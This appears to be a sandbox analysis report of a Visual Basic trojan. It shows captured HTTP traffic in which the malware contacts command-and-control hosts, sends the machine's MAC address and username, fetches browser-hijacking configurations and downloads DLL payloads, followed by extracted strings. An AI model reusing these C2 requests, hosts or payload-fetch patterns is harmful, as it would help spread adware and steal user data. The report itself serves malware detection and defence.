Accept-Ranges: bytes
ETag: "10baa56c5cdd11:a55b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:1 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)
Connection: keep-alive
hXXp://VVV.yaojyw.netHTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 15:23:19 GMT..Content-Length: 21..Content-Type: text/plain..Last-Modified: Fri, 24 Jun 2016 03:06:00 GMT..Accept-Ranges: bytes..ETag: "10baa56c5cdd11:a55b"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jinh93:1 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)..Connection: keep-alive..http://VVV.yaojyw.net....
GET /send/jwico.txt HTTP/1.1
User-Agent: RookIE/1.0
Host: yxtt.v138.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 47
Content-Type: text/plain
Last-Modified: Wed, 07 Jan 2015 05:43:26 GMT
Accept-Ranges: bytes
ETag: "689c5fdb3c2ad01:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jinh94:5 (Cdn Cache Server V2.0)
Connection: keep-alive
@fyww@tlww@jingwang1@jingwang2@jingwang3@ahhfjwHTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 17:21:04 GMT..Content-Length: 47..Content-Type: text/plain..Last-Modified: Wed, 07 Jan 2015 05:43:26 GMT..Accept-Ranges: bytes..ETag: "689c5fdb3c2ad01:a652"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jinh94:5 (Cdn Cache Server V2.0)..Connection: keep-alive..@fyww@tlww@jingwang1@jingwang2@jingwang3@ahhfjw....
GET /send/InsertWnd.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:45:23 GMT
Content-Length: 2402
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2016 03:33:23 GMT
Accept-Ranges: bytes
ETag: "a6b73c436f2d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
*browser..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://123.1313k.net/send/yxjtc/abc.htm..1^5^40^7^320^270^0^0^300^250^hXXp://yxtt.v138.net/send/yxjtc/iframeyxjlove.htm..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^MozillaWindowClass..2^Maxthon3Cls_MainFrm..2^QQBrowser_WidgetWin_0..3^........3^................3^........3^.................. ..3^..........3^..........3^............3^yswm..3^..........3^485......4^1000^600..5^1..*browserTitle..1^5^40^7^320^270^0^0^300^250^hXXp://yxtt.v138.net/send/yxjtc/ace.htm..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cls_MainFrm..2^MozillaWindowClass..2^QQBrowser_WidgetWin_0..4^1000^700..5^1..*browserVideo..1^820^220^5^215^308^0^0^195^288^hXXp://VVV.168wm.net/sp/t2345.asp?mdstr=..2^360se6_Frame..2^Chrome_WidgetWin_1..2^Chrome_WidgetWin_0..2^BRMainFrameGUI..2^Maxthon3Cls_MainFrm..2^MozillaWindowClass..2^QQBrowser_WidgetWin_0..2^IEFrame..3^..........3^..........4^1000^700..5^1..7^..........7^..........7^......7^soso..7^......7^..........*qq..1^-13^49^6^220^60^0^0^200^40^hXXp://123.1313k.net/send/yxjtc/qqtdb.htm..2^TXGuiFoundation..3^QQ..3^..........3^............3^..............3^......3^......3^..........3^............3^..........3^......3^..........3^..........3^..........3^....Q......3^..........3^...
<<< skipped >>>
GET /send/yxjk/jzyxj.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 14:38:20 GMT
Content-Length: 8416
Content-Type: text/plain
Last-Modified: Fri, 05 Aug 2016 02:27:44 GMT
Accept-Ranges: bytes
ETag: "48afbf2c0eed11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:6 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
dev.tg.wan.360.cn^^^800002..360tg.6711.com^^^800002..g.b.twyxi.com^^^800002...i5399.com^^^800002..g.6gh4.com^^^800002..tg.xylhgw.com^^^800002..g.s8dj.com^^^800002..t.xydhl.com^^^800002..t.cyuew.com^^^800002..*..........^^^800002...13resy.com^^^800002...luxi0891.com^^^800002...wywgx.com^^^800002...5p0n.com^^^800002..bai880.9ok2016.com^^^800002..bai660.android882.com^^^800002...51korean.com^^^800002...a3t6.cn/08^^^800002..183.61.162.85^^^800002...3gg.com^^^800002...926aasf.com^^^800002...kkkggg.cn^^^800002..70803344.com^^^800002...g5h5.com/bd^^^800002..cls.d54p.com^^^800002...52sf-lsi.com^^^800002...myfirstweb.cn^^^800002..183.61.162.86^^^800002...hgjg12.com^^^800002...woaisf2016.com^^^800002...haha2016.com^^^800002..qo8.m3b3.com^^^800002..zd.91913.cn^^^800002..VVV.zhaocs.com^^^800002..bai123.q77169.com^^^800002...888ppk.cn^^^800002...7lph.com^^^800002..4gfbf.jghr11.com^^^800002...futusff8.com^^^800002..bai330.tel2016.com^^^800002...qubasfkf.com^^^800002...asf.baidu1.com^^^800002..4fvrh.11vfsa.com^^^800002..info.yitsoftware.com^^^800002...12hjfrg.com^^^800002..6ag.3loz.com^^^800002...sjh520.com^^^800002..VVV.uc48.com/08^^^800002..*..........^^^800002..*....1.76^^^800002..*..........^^^800002..*..........^^^800002..*........^^^800002..g.b28g.com^^^800002..VVV.4399.com^^^800002..wan.sogou.com/^^^800002..tg.51.com^^^800002..g.fd4f.com^^^800002..g.b28g.com^^^800002..sx.juygj.com^^^800002..*....PK^^^800002..*......boss^^^800002..*..........^^^800002..*80......^^^800002..*........^^^800002..*............^^^800002..*...
<<< skipped >>>
GET /send/InsertWnd_2345title_en.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 20:18:02 GMT
Content-Length: 157184
Content-Type: application/x-msdownload
Last-Modified: Mon, 18 Jan 2016 07:42:12 GMT
Accept-Ranges: bytes
ETag: "9af64bec351d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}|}al|.<3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a......8...8...8....X..8.......8....X..8.......8....X..8...9...8....X..8.......8....X..8.......8....X..8./.....8.bc123}}}}}}}}}}a2&12.|~}... }}}abc12.}.\v|q}}..abs123.~}}M{}}.~ab#723}}m}m}}}.}agc023}}}x}|}}}}ab3723m}}}}}}.}=`bc!23m}}}}m}}m}abc12#}}}.?{}1}}aN!72.}}}}={}Q.}abc123}}}}}}}}}}ar 72#}}}}}}}}}}abc123}}}}}}}}}}abc123}}}.F{}5}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}(-%M}}}ab.223m}}}}}}}y}abc123}}}}}}}.}}.73i.3}}}}..}}.~ab=323y}}}}}}}}}abc12s}}.S....}}abs123={}}y}}}..abc123}}}}}}}=}}.bc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}NSMHa73i.>tsw...)./..b}72.2.}}.x}[x}.x`1F2A}h...gm.F.|P..*.x...4@...q..d.. ..Zi{..Cp...P....x......xk../.U..r....\....._e....l}O..* N=....].eM.....P2>....;D..)E......>..S..............r.A1C.%...2.4.jF....u..c)G...K.......Bq...?.$...YO...Sh..k....X1...KB..1..`.4....i.p....W.p.m...fE.".Tc-......Xw`..vL.oD....T......g..C......Mw..*G~..8.7ox..w..G...h.._vY\x..D....T.......}.iGb..V.].S.>...5.h.yX....R...kI...._[X...n....M........`.&...l5&.....y.....J.Z..L.......b<.......6D<tM.b$C.;.(..H.....k......E.:..e|....e|D.....;Y...\...{w
<<< skipped >>>
GET /ip.asp HTTP/1.1
User-Agent: vb wininet
Host: VVV.yswm.net
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA; path=/
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</script>HTTP/1.1 200 OK..Date: Sun, 25 Sep 2016 01:28:29 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 64..Content-Type: text/html..Set-Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA; path=/..Cache-Control: private..X-Cache: MISS from cache.51cdn.com..X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)..Connection: keep-alive..<script>window.location.href='ip.asp?ip=194.242.96.226'</script>....
GET /ip.asp HTTP/1.1
User-Agent: RookIE/1.0
Host: VVV.yswm.net
Cookie: ASPSESSIONIDSCTDRDQA=BCLFJBPCCJAHJJNPNDIDGCMA
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2016 01:28:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Cache-Control: private
X-Cache: MISS from cache.51cdn.com
X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<script>window.location.href='ip.asp?ip=194.242.96.226'</script>HTTP/1.1 200 OK..Date: Sun, 25 Sep 2016 01:28:42 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 64..Content-Type: text/html..Cache-Control: private..X-Cache: MISS from cache.51cdn.com..X-Via: 1.1 jinh94:2 (Cdn Cache Server V2.0)..Connection: keep-alive..<script>window.location.href='ip.asp?ip=194.242.96.226'</script>..
GET /mactj.asp?mac=0050563B0E71&uname=taian HTTP/1.1
User-Agent: vb wininet
Host: mactj.v138.net
HTTP/1.1 302 Redirct
Connection: Close
Pragma: no-cache
Location: hXXp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8;
Content-Length: 0;
GET /ic.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 1212.ip138.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Sun, 25 Sep 2016 01:28:56 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSAQSTTRB=BFEOKIHDPKHNBLGOJOJGPKFB; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.226] ............</center></body></html>HTTP/1.1 200 OK..Server: Microsoft-IIS/6.0..Connection: keep-alive..Date: Sun, 25 Sep 2016 01:28:56 GMT..Content-Type: text/html..Content-Length: 219..X-Powered-By: ASP.NET..Set-Cookie: ASPSESSIONIDSAQSTTRB=BFEOKIHDPKHNBLGOJOJGPKFB; path=/..X-Daa-Tunnel: hop_count=1..<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.226] ............</center></body></html>..
GET /osm.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 03:39:46 GMT
Content-Length: 84992
Content-Type: application/x-msdownload
Last-Modified: Fri, 20 May 2016 16:37:59 GMT
Accept-Ranges: bytes
ETag: "c1447f8b5b2d11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chengdianxin112:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}.}}al|.<3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a................s...............................0.RZ....}}}}}}}abc123}}}-8}}1|~a._.e3}}}}}}}.}s@ib723=|}}m}}}..aB.223..}}}y}}}}pbs123.}}y}}}|}}afc123}}}}my}}m}abc121}}}}}m}}m}abc!23m}}}}}}m}}a&o52.}}}.vy}.}}abc52.v}}}}}}}}}abc123}}}.qy}q}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}a73i.3}}}}..}}m}abc123y}}}}}}}}}abc12.}}.(-%L}}}ab#023..}}G|}}y}abc123}}}}}}}=}}.L.B@P}}}}m}}}}yabm123C|}}}}}}}}abc12s}}.}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}NSMHa73i.>tsw}....N.a..22.S|}}.~}[.}.x`12\....h....sK.J@^.[c.e`......4..%.p...u..E..?...m....3}?>..q.Pj...."(%.@Ok.........xw.....>.l.... ;.D...5.6(#@....Q\.`...'8.k......... ......x.$'...v.w.......r,.{.{H...E.@.&$...*FRi..Sx.....z1.D....n.Y.a.}.......z.G...i..>.1.v..._@...B....^...<.C...7eXI ..\...t..q.S.`C.t.g..n.U...w...=.9.<'Tt....,..7 ....~..1.:..DS.. u!...OdP.....:.$<.....0.. .....q....&.=u..CM.X..i....q. $....L...]L?T...A.$..C.....].x.wt..V.......(U...a.....2.y..x..u..W.71.........n-...3.(o.t...j(...b...!<...l
<<< skipped >>>
GET /newcor.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 02:34:10 GMT
Content-Length: 369152
Content-Type: application/x-msdownload
Last-Modified: Wed, 21 Sep 2016 02:32:20 GMT
Accept-Ranges: bytes
ETag: "8c18b360b013d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}u|}al|.<3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a..................JY....`.........PY......(.U.....]Y..............eY..............aY...............Y............0.RZ....}}}}}}}abc123}}}-8}}1|~a...e3}}}}}}}.}.@ib;23.x}}m}}}-ea".,23.e}}}c}}}}qbs123.}}x}|}}}}agc023}}}}mc}}m}abc121}=|}}m}}m}abc!23m}}}}}}m}}a^d/2.}}}.~c}=~}abc/2.~}}}}}}}}}abc123}}}.zc}e}}abc123}}}}}}}}}}abc123}}}}}}}}}}aB.,2{}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}a73i.3}}}}-e}}m}abc123y}}}}}}}}}abc12.}}.(-%L}}}ab.423.e}}.x}}y}abc123}}}}}}}=}}.L.B@P}}}}m}}}}cabk123.x}}}}}}}}abc12s}}.}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}NSMHa73i.>tsw..2.yL....,2..x}}E`}[n}dx`1..7{..>D.W...........>;Q.t .:.\..".....1?.......0.X.er.'5_...p.T3..U8.......P.,.l...N..o...P..3.....v......_W.B.....U...u..QK....pGp..1*<.S..]0..h.........Q|.8...?......JP..%u.l........5..@.jD...3...O.._. .j'..A....M....o_a..i....r.. .A...|!.g#.w.T.=.J.2-. ..;..../...%......"z.n..].=....i......w... C6@.._hiW..w..Y...k....MS...ti.!.l.PI.......f.O...m.....Uow..fp...~>.....^8......&... }...c. _.....Q....~..5~....tWg..&U..:.nx...(g;D....S.R.%7..=..aN.c'........w.}.?....Bl./(.}....^....2&...
<<< skipped >>>
GET /homepro.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 03:41:19 GMT
Content-Length: 161
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2016 02:07:56 GMT
Accept-Ranges: bytes
ETag: "ecd3da6df83d11:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:0 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
360chrome.exe@f1browser.exe@chrome.exe@360se.exe@liebao.exe@sogouexplorer.exe@ucbrowser.exe@2345explorer.exe@qqbrowser.exe@krbrowser.exe@maxthon.exe@theworld.exeHTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 03:41:19 GMT..Content-Length: 161..Content-Type: text/plain..Last-Modified: Tue, 22 Mar 2016 02:07:56 GMT..Accept-Ranges: bytes..ETag: "ecd3da6df83d11:a4e7"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jsyc108:0 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)..Connection: keep-alive..360chrome.exe@f1browser.exe@chrome.exe@360se.exe@liebao.exe@sogouexplorer.exe@ucbrowser.exe@2345explorer.exe@qqbrowser.exe@krbrowser.exe@maxthon.exe@theworld.exe....
GET /urlRemote.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.topyouxi.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 01:38:17 GMT
Content-Length: 100
Content-Type: text/plain
Last-Modified: Mon, 01 Aug 2016 06:38:16 GMT
Accept-Ranges: bytes
ETag: "48361949bfebd11:a4f3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[Config]..count=1..[url1]..name=url1..url=cpro.baidustatic.com/aj/static/sync.html?t=1469895477099..HTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 01:38:17 GMT..Content-Length: 100..Content-Type: text/plain..Last-Modified: Mon, 01 Aug 2016 06:38:16 GMT..Accept-Ranges: bytes..ETag: "48361949bfebd11:a4f3"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jsyc108:6 (Cdn Cache Server V2.0), 1.1 jsycdx41:4 (Cdn Cache Server V2.0)..Connection: keep-alive..[Config]..count=1..[url1]..name=url1..url=cpro.baidustatic.com/aj/static/sync.html?t=1469895477099....
GET /mactj.asp?mac=0050563B0E71&uname=taian?bttmfiqeiqqepoar HTTP/1.1
User-Agent: vb wininet
Host: mactj.v138.net
Connection: Keep-Alive
HTTP/1.1 302 Redirct
Connection: Close
Pragma: no-cache
Location: hXXp://mactj.v138.net/mactj.asp?mac=0050563B0E71&uname=taian
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8;
Content-Length: 0;
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_516:
`.rsrc
`.rsrc
).ri#
).ri#
}8!"###"!
}8!"###"!
!oOZ
!oOZ
vb6chs.dll
vb6chs.dll
RunExeModel
RunExeModel
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
D:\drivers\
D:\drivers\
\olelib.tlb
\olelib.tlb
DeleteUrlCacheEntryA
DeleteUrlCacheEntryA
F%System%\stdole2.tlb
F%System%\stdole2.tlb
epldrive.dll
epldrive.dll
mksparse.dll
mksparse.dll
DiskVolume.dll
DiskVolume.dll
oleaut32.dll
oleaut32.dll
shell32.dll
shell32.dll
winmm.dll
winmm.dll
CreatePipe
CreatePipe
ntdll.dll
ntdll.dll
%System%\msvbvm60.dll\3
%System%\msvbvm60.dll\3
VBA6.DLL
VBA6.DLL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
.text
.text
`.data
`.data
.rsrc
.rsrc
.reloc
.reloc
MSWNSK98.chm
MSWNSK98.chm
hhctrl.ocx
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
MSWINSCK.OCX
MSWINSCK.OCX
"255.255.255.255
"255.255.255.255
"6.00.8169
"6.00.8169
WSOCK32.dll
WSOCK32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
ADVAPI32.dll
ADVAPI32.dll
OLEAUT32.dll
OLEAUT32.dll
GDI32.dll
GDI32.dll
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyA
GetViewportExtEx
GetViewportExtEx
SetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
"%s%s.DLL
"%s%s.DLL
%s%s.DLL
%s%s.DLL
%u\%s.dll
%u\%s.dll
{lX-X-X-XX-XXXXXX}
{lX-X-X-XX-XXXXXX}
CLSID\%s
CLSID\%s
%s Object
%s Object
%s.%s.%ld
%s.%s.%ld
%s.%s
%s.%s
%s.%s\CurVer
%s.%s\CurVer
%s\InprocServer
%s\InprocServer
VERSION.DLL
VERSION.DLL
%ld - %s
%ld - %s
stdole2.tlbWWW
stdole2.tlbWWW
hsckTCPProtocolWW
hsckTCPProtocolWW
FsckUDPProtocolWWd
FsckUDPProtocolWWd
}|RemotePortWWd
}|RemotePortWWd
7LocalPortWWWd
7LocalPortWWWd
0ZBsckGetNotSupportedWW
0ZBsckGetNotSupportedWW
sckSetNotSupportedWW
sckSetNotSupportedWW
sckUnsupportedWW
sckUnsupportedWW
sckMsgTooBig
sckMsgTooBig
sckPortNotSupportedW
sckPortNotSupportedW
MSWinSck.OcxWW
MSWinSck.OcxWW
MSWNSK98.chmWW
MSWNSK98.chmWW
TCP protocolWW
TCP protocolWW
UDP protocolWW
UDP protocolWW
Returns/Sets the port to be connected to on the remote computerWWW0
Returns/Sets the port to be connected to on the remote computerWWW0
Returns/Sets the port used on the local computerWW*
Returns/Sets the port used on the local computerWW*
Binds socket to specific port and adapterW:
Binds socket to specific port and adapterW:
Occurs connect operation is completedW4
Occurs connect operation is completedW4
Occurs after a send operation has completedWWW
Occurs after a send operation has completedWWW
The argument passed to a function was not in the correct format or in the specified rangeW
The argument passed to a function was not in the correct format or in the specified rangeW
Unsupported variant typesW"
Unsupported variant typesW"
Invalid operation at current state
Invalid operation at current state
The operation is canceledW
The operation is canceledW
Socket is non-blocking and the specified operation will blockW
Socket is non-blocking and the specified operation will blockW
A blocking winsock operation is in progressWWWA
A blocking winsock operation is in progressWWWA
The operation is completed. No blocking operation is in progress.W
The operation is completed. No blocking operation is in progress.W
The specified port is not supportedWWW
The specified port is not supportedWWW
?$?0?6?
?$?0?6?
4'484%5-5
4'484%5-5
mswinsck.dbg
mswinsck.dbg
=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0
=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0
'hXXps://VVV.verisign.com/repository/CPS
'hXXps://VVV.verisign.com/repository/CPS
This certificate incorporates by reference, and its use is strictly
This certificate incorporates by reference, and its use is strictly
subject to, the VeriSign Certification Practice Statement (CPS)
subject to, the VeriSign Certification Practice Statement (CPS)
hXXps://VVV.verisign.com; by E-mail at CPS-requests@verisign.com; or
hXXps://VVV.verisign.com; by E-mail at CPS-requests@verisign.com; or
USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN
USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN
WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
